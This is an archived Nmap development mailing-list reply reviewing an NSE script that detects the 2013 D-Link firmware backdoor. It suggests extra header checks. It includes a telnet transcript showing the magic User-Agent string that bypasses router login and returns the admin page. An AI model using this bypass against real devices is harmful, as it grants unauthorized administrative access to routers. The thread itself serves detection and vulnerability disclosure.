Nmap Development mailing list archives
Re: D-Link firmware backdoor
From: Michael Meyer <michael.meyer () greenbone net>
Date: Wed, 16 Oct 2013 13:49:58 +0200
*** Patrik Karlsson wrote:
Please find a script attached to detect the D-Link firmware bypass outlined in this article: http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/ It's been a while since I committed something, so I will wait for some feedback before I do.
Just a note about...
and server:match("^thttpd%-alphanetworks"))
On some affected devices the server header is 'Server: Alpha_webserv' instead of 'Server: thttpd-alphanetworks/'...
if ( response.status == 200 )
...and there are also some devices which do not send a header at all when this fake user-agent is set. On such devices you could check for the existence of 'self.location.href' after successfully bypassing the login. mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080 Trying 192.168.44.8... Connected to 192.168.44.8. Escape character is '^]'. GET / HTTP/1.0 HTTP/1.0 401 Unauthorized Server: thttpd-alphanetworks/2.23 Content-Type: text/html Date: Tue, 15 Oct 2013 11:51:23 GMT Last-Modified: Tue, 15 Oct 2013 11:51:23 GMT Accept-Ranges: bytes Connection: close WWW-Authenticate: Basic realm="BRL-04UR" <HTML><HEAD><TITLE>401 Unauthorized</TITLE> [...] mime@kira[6]:~ (1)$ telnet 192.168.44.8 8080 Trying 192.168.44.8... Connected to 192.168.44.8. Escape character is '^]'. GET / HTTP/1.0 User-Agent: xmlset_roodkcableoj28840ybtide <HTML> <HEAD> <TITLE>BRL-04UR</TITLE> [...] self.location.href="index1.htm"; [...] Micha -- Michael Meyer OpenPGP Key: 52A6EFA6 http://www.greenbone.net/ Greenbone Networks GmbH, Neuer Graben 17, 49074 Osnabrück | AG Osnabrück, HR B 202460 Geschäftsführer: Lukas Grunwald, Dr. Jan-Oliver Wagner _______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- D-Link firmware backdoor Patrik Karlsson (Oct 15)
- Re: D-Link firmware backdoor Michael Meyer (Oct 16)
- Re: D-Link firmware backdoor David Maynor (Oct 16)
- Re: D-Link firmware backdoor Michael Meyer (Oct 16)
- Re: D-Link firmware backdoor Patrik Karlsson (Oct 16)
- Re: D-Link firmware backdoor Patrik Karlsson (Oct 17)
- Re: D-Link firmware backdoor David Maynor (Oct 16)
- Re: D-Link firmware backdoor Michael Meyer (Oct 16)